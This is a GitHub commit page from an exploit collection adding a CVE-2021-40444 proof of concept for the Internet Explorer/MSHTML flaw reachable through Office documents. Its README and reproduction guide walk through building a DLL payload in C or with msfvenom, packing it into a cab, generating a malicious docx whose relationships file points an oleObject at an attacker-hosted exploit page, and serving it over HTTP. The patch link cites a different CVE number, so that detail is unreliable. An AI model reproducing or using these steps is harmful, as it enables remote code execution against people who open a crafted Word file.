Skip to content

Commit

Permalink
Add IE RCE Vulnerability:sweet_potato:
Browse files Browse the repository at this point in the history
  • Loading branch information
Ascotbe committed Sep 11, 2021
1 parent c74a613 commit 5b6a33a
Show file tree
Hide file tree
Showing 26 changed files with 1,123 additions and 253 deletions.
2 changes: 1 addition & 1 deletion CVE-2018-8453/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -40,7 +40,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8453

测试系统Windows 10 1709 x64

![CVE-2018-8453](https://github.com/Ascotbe/Random-img/raw/master/WindowsKernelExploits/CVE-2018-8453_win10_1709_x64.gif)
![CVE-2018-8453](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2018-8453_win10_1709_x64.gif)

#### 分析文章
- https://github.com/thepwnrip/leHACK-Analysis-of-CVE-2018-8453
Expand Down
124 changes: 124 additions & 0 deletions CVE-2021-40444/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,124 @@
### CVE-2021-40444

#### 描述

这个漏洞是IE浏览器的漏洞,但是offer相关组件默认使用的是IE浏览器,所以在offer相关组件禁用了ActiveX也一样可以执行

#### 影响版本

| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | -------- |
| Windows 10 | x86/x64 | | | |
| Windows 10 | x86/x64 | 1607 | | |
| Windows 10 | x86/x64/AMD64 | 1809 | | |
| Windows 10 | x86/x64/AMD64 | 1909 | | |
| Windows 10 | x86/x64/AMD64 | 2004 | | ✔ |
| Windows 10 | x86/x64/AMD64 | 20H2 | | |
| Windows 10 | x86/x64/AMD64 | 21H1 | | |
| Windows 7 | x86/x64 | | SP1 | |
| Windows 8.1 | x86/x64 | | | |
| Windows Rt 8.1 | | | | |
| Windows Server 2008 | x86/x64 | | SP2 | |
| Windows Server 2008 | x64 | R2 | SP1 | |
| Windows Server 2012 | | | | |
| Windows Server 2012 | | R2 | | |
| Windows Server 2016 | | | | |
| Windows Server 2019 | | | | |
| Windows Server 2022 | | | | |
| Windows Server | | 2004 | | |
| Windows Server | | 20H2 | | |



#### 修复补丁

```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36934
```

#### 利用原理

根据之前在野利用样本`938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52`可以知道,其实就是利用默认浏览器(IE)加载ActiveX

![image-20210911112944428](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-40444_Windows_10_2004_X64_1.png)

本质上恶意利用只需要修改样本中的`document.xml.rels`文件中框起来mhtml和x-usc这两段内容该为恶意目标网页,即可达到利用

#### 利用方式

首先需要生成一个恶意的DLL文件,通过msf或者自己编译都行

- 自己编译

```c
//calc.c
#include <windows.h>

void exec(void) {
system("cmd /c calc");
return;
}

BOOL WINAPI DllMain(
HINSTANCE hinstDLL,
DWORD fdwReason,
LPVOID lpReserved )
{
switch( fdwReason )
{
case DLL_PROCESS_ATTACH:
exec();
break;

case DLL_THREAD_ATTACH:
break;

case DLL_THREAD_DETACH:
break;

case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
```
然后运行命令
```
i686-w64-mingw32-gcc -shared calc.c -o calc.dll
```
- 通过msf编译
```
msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -f dll>>calc.dll
```
> 最好使用MSF生成DLL文件!
>
> 还有请看准对应机器,有些Windows 10 版本不存在该问题
安装环境所需要的依赖`sudo apt-get install lcab`,生成 cab用的
接着使用一键化脚本,`test/calc.dll`这个为你生成的哪个dll所在的绝对路径,`http://you_ip`你启动exp这台机器的IP
```
cd CVE-2021-40444 ; python3 exploit.py generate test/calc.dll http://you_ip
```
![image-20210911115757383](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-40444_Windows_10_2004_X64_2.png)
然后启动http服务
```
cd srv ; python3 -m http.server 80
```
接着把生成的恶意docx文件(在`out/`文件夹中),放到目标机器上(Windows 10 2004 x64),即可执行成功
![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-40444_Windows_10_2004_X64_3.gif)
#### 参考项目
- [prcabral](https://github.com/prcabral/CVE-2021-40444)
77 changes: 77 additions & 0 deletions CVE-2021-40444/REPRODUCE.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,77 @@
# CVE-2021-40444

Reproduce steps for CVE-2021-40444

These reproduction steps are based on some reverse engineering over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file).

## Generating docx

Go to `maldoc/word/_rels/document.xml.rels` and edit the two ocurrences for `http://<HOST>` with the URL to the exploit.html Eg.: `http://127.0.0.1/exploit.html` file.

Generate docx:

`cd maldoc/ ; zip -r maldoc.docx *`

## Generating malicious cab

```
#include <windows.h>
void exec(void) {
system("C:\\Windows\\System32\\calc.exe");
return;
}
BOOL WINAPI DllMain(
HINSTANCE hinstDLL,
DWORD fdwReason,
LPVOID lpReserved )
{
switch( fdwReason )
{
case DLL_PROCESS_ATTACH:
exec();
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
```

Exec:

`i686-w64-mingw32-gcc -shared calc.c -o calc.dll`

Generate cab (install lcab `sudo apt-get install lcab`)

`cp calc.dll championship.inf ; mkdir gen/ ; cd gen/ ; lcab '../championship.inf' out.cab`

Copy out.cab into `www/` directory, modify exploit.html to point to `http://127.0.0.1/out.cab`

Execute Python script: `patch_cab.py`

Finally, setup server:

`cd www/ ; sudo python3 -m http.server 80`

# End

Execute now maldoc.docx in target VM

If not working, make sure there is a `championship.inf` file at `C:\Users\<user>\AppData\Temp\`

If file is present but DLL did not get executed, make sure you are opening docx from a folder reached from by exploit.html, like Documents, Desktop, or Downloads.

# More

To automatically resolve the array obfuscation on HTML file use `deobfuscate.py` (already has hardcoded the mutated array)

Anyway, there is already a deobfuscated version: `deob.html`
2 changes: 2 additions & 0 deletions CVE-2021-40444/data/word_dat/[Content_Types].xml
Original file line number Diff line number Diff line change
@@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="jpeg" ContentType="image/jpeg"/><Default Extension="wmf" ContentType="image/x-wmf"/><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/><Override PartName="/word/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"/><Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/><Override PartName="/word/webSettings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"/><Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"/><Override PartName="/word/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/></Types>
2 changes: 2 additions & 0 deletions CVE-2021-40444/data/word_dat/_rels/.rels
Original file line number Diff line number Diff line change
@@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/></Relationships>
2 changes: 2 additions & 0 deletions CVE-2021-40444/data/word_dat/docProps/app.xml
Original file line number Diff line number Diff line change
@@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template>Normal</Template><TotalTime>34</TotalTime><Pages>1</Pages><Words>206</Words><Characters>1176</Characters><Application>Microsoft Office Word</Application><DocSecurity>0</DocSecurity><Lines>9</Lines><Paragraphs>2</Paragraphs><ScaleCrop>false</ScaleCrop><Company>Consumers Association</Company><LinksUpToDate>false</LinksUpToDate><CharactersWithSpaces>1380</CharactersWithSpaces><SharedDoc>false</SharedDoc><HyperlinksChanged>false</HyperlinksChanged><AppVersion>16.0000</AppVersion></Properties>
2 changes: 2 additions & 0 deletions CVE-2021-40444/data/word_dat/docProps/core.xml
Original file line number Diff line number Diff line change
@@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><dc:title></dc:title><dc:subject></dc:subject><dc:creator>Microsoft</dc:creator><dc:description></dc:description><cp:lastModifiedBy>user</cp:lastModifiedBy><cp:revision>6</cp:revision><dcterms:created xsi:type="dcterms:W3CDTF">2013-10-31T15:25:00Z</dcterms:created><dcterms:modified xsi:type="dcterms:W3CDTF">2021-08-31T16:47:00Z</dcterms:modified><dc:language>en-US</dc:language></cp:coreProperties>
2 changes: 2 additions & 0 deletions CVE-2021-40444/data/word_dat/word/_rels/document.xml.rels
Original file line number Diff line number Diff line change
@@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:<EXPLOIT_HOST_HERE>!x-usc:<EXPLOIT_HOST_HERE>" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpeg"/></Relationships>
Loading

0 comments on commit 5b6a33a

Please sign in to comment.